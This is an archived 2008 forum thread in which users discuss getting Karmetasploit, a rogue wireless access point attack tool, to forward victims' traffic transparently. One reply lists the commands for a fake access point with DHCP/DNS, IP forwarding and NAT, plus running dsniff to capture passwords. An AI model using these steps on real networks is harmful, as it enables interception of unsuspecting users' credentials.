View Full Version : Transparent Karmetasploit

09-21-2008, 10:58 PM
I got Karmetasploit up and running following the tutorial on Metasploit's site (metasploit.com/dev/trac/wiki/Karmetasploit). Everything works fine, however, when a client connects to karmetasploit, lets say the client tries to go to google...karmetasploit does its thing and gets information but google never loads.

I cant seem to find any information on making karmetasploit transparent. Has anybody figured it out?

09-22-2008, 07:58 AM
what is ur network configuration?
how many nics and their configuration

09-22-2008, 03:54 PM
if you go back and read that documentation it will tell you that its a blackhole and doesnt forward traffic on

09-23-2008, 10:18 PM
Yea, I know. I saw a video of a demonstration of karmetasploit and he had it working transparently (I dont remember where I saw the video). I was curious to see if anybody know how he did it.

09-24-2008, 12:36 AM
I have no clue have never used it... but I'm guessing you would need a separate internet connection and have all traffic proxied through that connection ... it'd be like bridging the connection....

they connect to you, and you have it getting their info and then it passes it through to google or whatever through the other connection...

don't think you can do it with just one connection...

10-01-2008, 05:30 PM
It would seem that the main issue would be how well your system can route traffic. If your system has all the functionality of a wireless ap then it should be possible to masquerade as the friendly router and send the traffic back and forth.

if you are trying to be just a transparent man in the middle that sniffs passwords (like what Cain and Abel do for a wired connections) then there may be a better way of going about it than karmetasploit. Since the main function of karmetasploit isn't to be passive but to find vulnerabilities which is much easier if the client thinks you are a legit AP and then exploit what you find to deliver your payload.

10-01-2008, 08:26 PM
To be able to do the attack the way you whant you have to install dnsmasq

wget vvvvvv.thekelleys[org][uk]/dnsmasq/dnsmasq-2.45.tar.gz (I have not reached 15 posts)
tar xvzf dnsmasq-2.45.tar.gz
cd dnsmasq-2.45
make && make install

once you have dnsmaq, create a conf file with the parameter you might need, then you can setup the machine to bridge from your wireless card to the NIC like this:

wlanconfig ath0 destroy
airmon-ng start ath0
airbase-ng -c 1 -e testwlan ath0
ifconfig at0 up && dhcpd at0
dnsmaq -C /etc/dnsmasq.conf &
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

once you are bridging and providing the correct DHCP and DNS info run dsniff -c -m -i at0. Do use the latest drivers and patch them and also use the latest svn of aircrack-ng, is this what you where looking for? your milage may vary depending on the card and the version of the driver.

10-30-2008, 04:23 PM
Hey Karma, any chance you could post the .conf file you used? Ive been working on mine and I keep getting glitches and Id like to compare them.

11-03-2008, 05:49 PM
I get this error when I follow your steps outlined above:

dnsmasq: failed to bind listening socket to Address already in use
or if I specify with -a:

dnsmasq: failed to create listening socket: Address already in use


11-11-2008, 01:22 AM
i saw "the middler" do this at the last defcon, and he wasnt using a 2nd bridged connection. he basically sat in the middle forging replies to both ends, cool stuff, but i haven't found the code released yet...